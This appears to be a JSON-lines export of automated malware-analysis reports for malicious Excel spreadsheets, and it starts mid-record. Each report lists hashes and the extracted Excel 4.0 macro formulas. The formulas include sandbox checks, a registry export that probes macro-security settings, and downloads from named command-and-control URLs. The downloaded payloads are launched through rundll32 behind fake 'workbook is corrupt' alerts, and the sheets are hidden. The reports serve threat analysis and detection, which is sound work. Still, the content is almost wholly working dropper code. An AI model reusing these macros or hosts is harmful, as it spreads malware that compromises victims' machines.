corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Hllv8Min9q\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"24b9f87bd482eae70901cc824cad728d17584dd86bd4b06105f196acece4a9ee"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"24b9f87bd482eae70901cc824cad728d17584dd86bd4b06105f196acece4a9ee","filesize":209920,"md5":"35a183b5f8011ecd77be3215367bf093","sha1":"abc550bfebb7264a6b33c1281cf7943fb1469e3c","sha256":"24b9f87bd482eae70901cc824cad728d17584dd86bd4b06105f196acece4a9ee","sha512":"21242f1465481ed78326b87fcba31e8685bd2266cb317cd1332d3786140b22e9ae9eb016ed03d40b07c26306caea8528c52c5a4721a9803b96e246fbf38edf45","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"24b9f87bd482eae70901cc824cad728d17584dd86bd4b06105f196acece4a9ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"p63BwEwqhI\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"24c4b5bd9a98c18f4997fe5d1babd681d2fbc449371adeb954abf8a250a54268"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"24c4b5bd9a98c18f4997fe5d1babd681d2fbc449371adeb954abf8a250a54268","filesize":209920,"md5":"2956cb5832cdff270ba993976e9e3e67","sha1":"84d0bca7abc4923f7802e09474bbf771bd50de94","sha256":"24c4b5bd9a98c18f4997fe5d1babd681d2fbc449371adeb954abf8a250a54268","sha512":"95bd6c597e786cf6f1ef621b2dcd68ed274e4e958903709ae5f79e7bce9d917751be1d3eba82997eb59e894e80d700bd6cfad9071df5175a304335c7480140a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"24c4b5bd9a98c18f4997fe5d1babd681d2fbc449371adeb954abf8a250a54268.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"l9klUn5zyS\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"24cf06530f0ac404fd52f1192809235989eddf12cfcbcc30f5f0e8ce4298b792"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"24cf06530f0ac404fd52f1192809235989eddf12cfcbcc30f5f0e8ce4298b792","filesize":177152,"md5":"bf4700f66160fa9f6a2b4880c1a5a472","sha1":"af46abd768d17feeac32c5d028fbbbd3af60531d","sha256":"24cf06530f0ac404fd52f1192809235989eddf12cfcbcc30f5f0e8ce4298b792","sha512":"4f519916b026184132bad6262297d512cd91aca7bbd968fb466a74aec87ccd1a23b0bf51acf818a884df117ce1ff314abf4805a2605756ab518a61b6426bdd89","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"24cf06530f0ac404fd52f1192809235989eddf12cfcbcc30f5f0e8ce4298b792.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"up7YFv9gvv\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"24d9289850167d4dcd312d2f2a41a8b43f4dd02057b36b85ffd5d567dd720efb"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"24d9289850167d4dcd312d2f2a41a8b43f4dd02057b36b85ffd5d567dd720efb","filesize":168960,"md5":"96c19a69a569b49d9d8d127dac96ba9b","sha1":"84830ab7b7c5d95d11cbf4fa16a52315a9ea485b","sha256":"24d9289850167d4dcd312d2f2a41a8b43f4dd02057b36b85ffd5d567dd720efb","sha512":"b73929169b8da00c35780b2c8222f0ab97d6f56cdef5f0772203933e33beb0cc91f593203f49d158313f7ac1168fb2f8453d0d40f6101910c0b87babe01032d6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"24d9289850167d4dcd312d2f2a41a8b43f4dd02057b36b85ffd5d567dd720efb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HtdJWhSnlV\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"24fb844407c8fff56aa254c36377597d36f6f26c19b5cd5bdebdb85b93418f13"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"24fb844407c8fff56aa254c36377597d36f6f26c19b5cd5bdebdb85b93418f13","filesize":167936,"md5":"a45971de9810129e9bfc27bd84cb4ab2","sha1":"ce28e584a9bc30a2c085bee09fa317daf8b59536","sha256":"24fb844407c8fff56aa254c36377597d36f6f26c19b5cd5bdebdb85b93418f13","sha512":"66f4aca4588e0d59b45cd9f6d26dc918fce15b7dc7553fe548abf8d0e9ee46af76e00f6b5542993cc3549e4188d568bc85bce0fdd8c50538944f520ab4aa8160","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"24fb844407c8fff56aa254c36377597d36f6f26c19b5cd5bdebdb85b93418f13.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fbfeNTGZv9\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2502e67a7b02976836c671bec4c426f8fde82c71f29a9aa7ec16c1d327a12391"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"2502e67a7b02976836c671bec4c426f8fde82c71f29a9aa7ec16c1d327a12391","filesize":167936,"md5":"9b237cbc457a532b3a14bd7730a4b26e","sha1":"5be7825f2bb7c4623646ab4e6dd27bc9f99e24d8","sha256":"2502e67a7b02976836c671bec4c426f8fde82c71f29a9aa7ec16c1d327a12391","sha512":"8aee7dd68aa301519dcc1b36b3adaa182ab0ca0f8b2c7559867e2b3c6ea3422daa543bc758e78d19c01780c957e97a37bc19faeaf421f33c0540769f0a853404","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2502e67a7b02976836c671bec4c426f8fde82c71f29a9aa7ec16c1d327a12391.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wRm5MeZuX5\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"250336760a5fe8b7c59278bd6e51fdb5413740c463d9fa93e8d5b67e9578fdd2"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"250336760a5fe8b7c59278bd6e51fdb5413740c463d9fa93e8d5b67e9578fdd2","filesize":206336,"md5":"bed46064d78ccc48e87b4642de3a827b","sha1":"a8c17c094db062d17fb578f44d308a2a8b091e5d","sha256":"250336760a5fe8b7c59278bd6e51fdb5413740c463d9fa93e8d5b67e9578fdd2","sha512":"da0dbe5a13157f763a5fccc1f7630507cf8aab18ceb5b962ea402aff2aa464e2e6937e75ac439fc88f83f78113941265180dd3780de12daeface0bfd42a0375d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"250336760a5fe8b7c59278bd6e51fdb5413740c463d9fa93e8d5b67e9578fdd2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VwaqV8Ghvr\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"250b49aeceab6b1979ba941e5e68c0655911a10284100ec6b5f370bedb04ddce"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"250b49aeceab6b1979ba941e5e68c0655911a10284100ec6b5f370bedb04ddce","filesize":168960,"md5":"ea48d41ee3e91bcdeb860eff49be7c1e","sha1":"b8381cf0d7b5ee4a68939a3b535b3e9e8bdd2971","sha256":"250b49aeceab6b1979ba941e5e68c0655911a10284100ec6b5f370bedb04ddce","sha512":"34bfea107dececdd26c4b4610117ef3bf4cd48cc9743ed1aa2a21dfed531a7513f11ea6067eaf0f043f909dc7848cb8c6721117da99df09be3f3510d38984e20","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"250b49aeceab6b1979ba941e5e68c0655911a10284100ec6b5f370bedb04ddce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TPbWoDhLrs\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2510891f29121f26e365ac4997da1c556ca6ab694b8f9cb9eb8b4ea2bee37984"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"2510891f29121f26e365ac4997da1c556ca6ab694b8f9cb9eb8b4ea2bee37984","filesize":185344,"md5":"156ed769e9fa28a8d1e027f6a9da4b69","sha1":"2676cffb6ba38d00c0711c6a75662652acd8c8f9","sha256":"2510891f29121f26e365ac4997da1c556ca6ab694b8f9cb9eb8b4ea2bee37984","sha512":"f9b9d24bcbabb3b9d5aada8d1d6801294d7098f20f0bcf704d77a35a7c747415253054bc1e88b46667e51a775e20b4631108c374a87dffd4ac6632484e94e669","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2510891f29121f26e365ac4997da1c556ca6ab694b8f9cb9eb8b4ea2bee37984.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2515d5ce86ffb3d94908ba8d86f0f29367f43a6cd4b443f13d4d47601e40990e"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"2515d5ce86ffb3d94908ba8d86f0f29367f43a6cd4b443f13d4d47601e40990e","filesize":145920,"md5":"627fbb2699aa219b7afa0987325b5e5f","sha1":"1f0043f4efde869a8823b00ff164bf1c04935b34","sha256":"2515d5ce86ffb3d94908ba8d86f0f29367f43a6cd4b443f13d4d47601e40990e","sha512":"cd158c46bdd521b158c99abee500028706e049177724e686ef354aacfb8d4378109bbc8552b83d3d7cace476d442a689e604a8f8658196ba593172224bf78fbb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2515d5ce86ffb3d94908ba8d86f0f29367f43a6cd4b443f13d4d47601e40990e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"leL0fXhiQd\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2535e043c4dae0d4c364b84b49cbb2b6648939e5277b3d697e8288290c5f6cd9"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"2535e043c4dae0d4c364b84b49cbb2b6648939e5277b3d697e8288290c5f6cd9","filesize":214016,"md5":"15300469e5e70cc88bfa4f2ab79e5cd3","sha1":"e2d3c51093ed7ca4d252a494ff24e93593bedbf7","sha256":"2535e043c4dae0d4c364b84b49cbb2b6648939e5277b3d697e8288290c5f6cd9","sha512":"99df7ce8b701fd37cf4fc64eb8668bbb33dafffc6d70e95658f2f707a066c0600c20e0b117032301e1f49c205c94c77de19a4b88db62cccfb989578a6c497e6b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2535e043c4dae0d4c364b84b49cbb2b6648939e5277b3d697e8288290c5f6cd9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IjTLx3PUlR\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"254ac73d760db86bf930c27bfb982d9beffca89dfd3c26128439e34fa93031c7"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"254ac73d760db86bf930c27bfb982d9beffca89dfd3c26128439e34fa93031c7","filesize":185344,"md5":"a77e7e13e129640f3032aae9a32f3400","sha1":"33c2afaff52bd5e08dab6f17d01635dc82c40ffd","sha256":"254ac73d760db86bf930c27bfb982d9beffca89dfd3c26128439e34fa93031c7","sha512":"291a1fe13c69c5b84fbf3d2b0f3e0e533b2713b6e620675291ed0d5bc304cb2cb2a65b1ef2fce8af4708a11ee2994628203b065b57ffa6922ca792555058338c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"254ac73d760db86bf930c27bfb982d9beffca89dfd3c26128439e34fa93031c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"254c257c3ebb303a3ebc7fc61af6b9c6e6a231dcb93c0f766630e33ed9d335b6"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"254c257c3ebb303a3ebc7fc61af6b9c6e6a231dcb93c0f766630e33ed9d335b6","filesize":168448,"md5":"0b77eced91d809aa1ed858d08743e592","sha1":"5b745dff35178cab5429ccbd6809db203c6394fd","sha256":"254c257c3ebb303a3ebc7fc61af6b9c6e6a231dcb93c0f766630e33ed9d335b6","sha512":"1ba7e93009c9018cd70e8122e48ac4a95d4a9f70178de4b665681dbef55f39d70f39b36fb89c8fbde9b5e5e34884b4e06b374715785a112e8498f6c3dac9e8a8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"254c257c3ebb303a3ebc7fc61af6b9c6e6a231dcb93c0f766630e33ed9d335b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MehT5Ga0am\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2556cafe54bcef727fc577f064c8e33321df075b4f52f5821ad041b4c068c147"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"2556cafe54bcef727fc577f064c8e33321df075b4f52f5821ad041b4c068c147","filesize":152576,"md5":"67cd39e481ec22dea87f984a49f7f6cc","sha1":"09016cda7c37c63f82eecc81133eb875e2ffe249","sha256":"2556cafe54bcef727fc577f064c8e33321df075b4f52f5821ad041b4c068c147","sha512":"24224e27355117769cedc9193d3afd35f4829970de36eb21e4fcbfbd94d27d050d909c5b4e2572ac364977b812fe31bf79762f006b2b4da681be26a00f4fbf51","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2556cafe54bcef727fc577f064c8e33321df075b4f52f5821ad041b4c068c147.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KZ3T2uQxx2\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"256a2e1641c4a14e76485d280e0fc89244112bcb4a3f56b936abe3cae3c452da"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"256a2e1641c4a14e76485d280e0fc89244112bcb4a3f56b936abe3cae3c452da","filesize":204800,"md5":"ef610d4534f091dd4ef7273a703f8b88","sha1":"13f1f632456f9a1bd34aa27226ddb979c9c80c76","sha256":"256a2e1641c4a14e76485d280e0fc89244112bcb4a3f56b936abe3cae3c452da","sha512":"795082d1fa3f8f4cd02538d1b184601ad7c46a4e3bca1720f1b43209a6b045e01ae5b7d924baf8dff2087673bea49edf1d1c34e45386c9daac099538604b265e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"256a2e1641c4a14e76485d280e0fc89244112bcb4a3f56b936abe3cae3c452da.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,HALT())\nIF(GET.WORKSPACE(42),,HALT())\nFOPEN(\"C:\\Users\\Public\\1.vbs\",3)\nMESSAGE(TRUE,\"One moment please...\")\nIF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),EXEC(GET.NOTE(R$34C$3)),)\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$36C$3)),)\nHALT()"}}}]}
